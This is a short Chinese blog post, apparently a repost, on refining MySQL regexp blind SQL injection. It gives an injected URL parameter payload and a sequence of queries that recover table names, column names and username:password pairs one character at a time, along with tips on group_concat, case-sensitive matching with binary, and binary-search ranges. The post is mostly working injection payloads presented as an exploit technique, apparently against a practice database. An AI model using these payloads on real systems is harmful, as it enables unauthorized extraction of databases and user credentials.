regexp盲注的一些改进

时间：2018-03-04 22:50:20 阅读：229 评论：0 收藏：0 [点我收藏+]

index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP ‘^[a-z]‘ LIMIT 0,1) /*

　　这是之前看别人的文章写的exp,觉得有点啰嗦,其实可以很直白的写

select group_concat(table_name) from information_schema.tables where table_schema=‘security‘;
select((select group_concat(table_name) from information_schema.tables where table_schema=‘security‘) regexp binary ‘^e‘);
select group_concat(column_name) from information_schema.columns where table_name=‘users‘;
select((select group_concat(column_name) from information_schema.columns where table_name=‘users‘) regexp binary ‘^i‘);
select group_concat(username,‘:‘,password) from security.users;
select((select group_concat(username,‘:‘,password) from security.users) regexp binary ‘^D‘);

几个注意点

1 可以直接用group_concat全部匹配出来

2 mysql中用regexp是区分大小写的,只有对取md5的时候没关系,其他时候要加上binary,不过取数据时就不用group_concat了,用limit一条一条取

3 regexp也可以用二分法 ‘^[a-z]‘ 到 ‘^[a-h]‘

regexp盲注的一些改进

原文：https://www.cnblogs.com/junmoxiao/p/8506441.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)